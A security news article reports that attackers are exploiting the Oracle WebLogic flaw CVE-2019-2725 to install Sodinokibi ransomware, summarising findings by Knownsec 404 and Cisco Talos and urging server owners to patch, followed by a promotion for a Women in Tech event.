Attackers now exploiting critical Oracle WebLogic Server flaw to install new 'Sodinokibi' ransomware

WebLogic Server vulnerability first discovered earlier this month by security researchers at Knownsec 404

Hackers are exploiting a zero-day vulnerability in Oracle WebLogic to install a new ransomware variant, dubbed Sodinokibi, on servers.

The flaw was first discovered earlier this month by security researchers at Knownsec 404, who found it to be able to trigger the deserialisation of malicious code, enabling attackers to hijack servers, conduct remote execution and send arbitrary commands. According to the researchers, the flaw affected all versions of WebLogic.

On 26^th April, Oracle released a patch to address this vulnerability.

"Due to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible," said Eric Maurice, director of security assurance at Oracle, in a blog post.

Now, the security experts from Cisco Talos have found that hackers have already exploited the vulnerability to install malware such as botnets, miners, and even ransomware.

The researchers first noticed the new ransomware on 25th April when attackers tried to establish an HTTP connection with an Oracle WebLogic server.

So far, researchers have identified two strands of ransomware, dubbed Sodinokibi and GandCrab.

Sodinokibi can encrypt the files in a user's directory on the infected machine using a random extension, which is unique for each machine. It can also delete reliable backups to make the recovery process more difficult.

Sodinokibi doesn't require any type of user interaction to infect a system simply because hackers can leverage the flaw to force the targeted server to download a copy of the ransomware.

In one instance, attackers, after finding a vulnerable server, sent an HTTP POST request (containing a PowerShell command) to the server. It then downloaded a file "radm.exe" which then saved the ransomware on the machine and executed it.

According to researchers, once Sodinokibi ransomware is installed on a machine, the attackers show a ransom note to demand money in exchange for providing decryption keys. The ransom note usually contains links to a payment site and a unique key.

When victims visit the payment site, they are asked to submit unique key and extension. Once those details are entered, they are shown the ransom amount (around $2,500) and a bitcoin address to make the payment. Victims are also given a deadline to transfer the amount. In case, they miss the deadline, the second strain of ransomware, dubbed 'GandCrab', is launched, and the ransom amount is doubled.

After the payment is made by victims and confirmed on the Blockchain, the attackers provide them with a link to download the decryption key.

The researchers believe the attacks on Oracle's WebLogic servers will increase in coming days.

"Due to the ubiquity of Oracle WebLogic servers and the ease of exploitation of this vulnerability, Talos expects widespread attacks involving CVE-2019-2725," the researchers said in a blog post.

They advise server owners to apply Oracle's recent patch to secure their machines from any future attack.

Computing and CRN have united to present the Women in Tech Festival UK 2019, on 17 September in London.

The event will celebrate successful women in the IT industry, enabling attendes to hear about, and to share, personal experiences of professional journeys and challenges.

Whether you're the ‘Next Generation', an ‘Inspirational Leader', or an ‘Innovator of Tech' this event will offer inspiration on not only how to improve yourself, but how to help others too. The event is FREE for qualifying IT pros, but places will go fast